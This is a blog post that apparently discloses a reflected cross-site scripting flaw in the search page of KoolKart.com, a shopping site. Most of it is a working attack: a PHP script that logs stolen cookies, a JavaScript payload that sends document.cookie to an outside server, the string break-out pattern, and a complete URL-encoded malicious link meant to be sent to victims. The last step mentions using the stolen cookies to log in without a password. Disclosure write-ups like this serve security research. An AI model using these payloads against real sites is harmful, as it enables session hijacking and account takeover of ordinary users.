KoolKart.com, get Kooler by sanitizing your input

Standard

Earlier, I demonstrated the XSS vulnerability in DealsAndYou (fixed) and now, I’ll demo a XSS bug on KoolKart.com. I’ll describe the whole process below.

Step 1 – Writing a php script for saving cookie returned by injected code (cookie-stealer.php).

$str = trim($_REQUEST['cookie']);
$file = 'cookie.txt';
if(!empty($str)){
    $current = file_get_contents($file);
    $current .= date('Y-m-d H:i:s') . "\t\t" . $str . "\n\n\n";
    file_put_contents($file, $current);
    header('Location: http://www.koolkart.com/');
}

The code is self explanatory. It gets the cookie information via querystring, saves it to a text file and redirects back to koolkart.

Step 2 – Writing the javascript injection script.

var mycookie=document.cookie;
window.location.href='http://vivekgupta.com/test/cookie-stealer.php?cookie='+escape(mycookie);

The above code gets the cookie and sends it to the remote server with cookie information as query string.

Step 3 – Finding the XSS pattern.

It took me a couple of tries to find the vulnerable javascript code KoolKart. I realized that the search term passed to the following jquery statement was not being sanitized:

$("#product-search-bar").val("");

So I created a pattern to utilize this bug. The pattern looks like:

");eval("Javascript code here

Below is the final javascript injection code

");eval("var mycookie=document.cookie;window.location.href='http://vivekgupta.com/test/cookie-stealer.php?cookie='+escape(mycookie);

Urlencoding this gives us:

%22%29%3Beval%28%22var+mycookie%3Ddocument.cookie%3Bwindow.location.href%3D%27http%3A%2F%2Fvivekgupta.com%2Ftest%2Fcookie-stealer.php%3Fcookie%3D%27%2Bescape%28mycookie%29%3B

Now, search for anything on KoolKart to get the following search URL:

KoolKart Search URL

KoolKart Search URL

Replace the search term (a in my case) with the urlencoded injection code. This is the malicious link which can be sent to the victim to steal their cookie.

http://www.koolkart.com/search.htm?text=%22%29%3Beval%28%22var+mycookie%3Ddocument.cookie%3Bwindow.location.href%3D%27http%3A%2F%2Fvivekgupta.com%2Ftest%2Fcookie-stealer.php%3Fcookie%3D%27%2Bescape%28mycookie%29%3B&cat=Everything&m=

Step 4 – Stealing the cookie information and using it to log in without username and password.

The video below describes the whole process:

Leave a Reply

Your email address will not be published. Required fields are marked *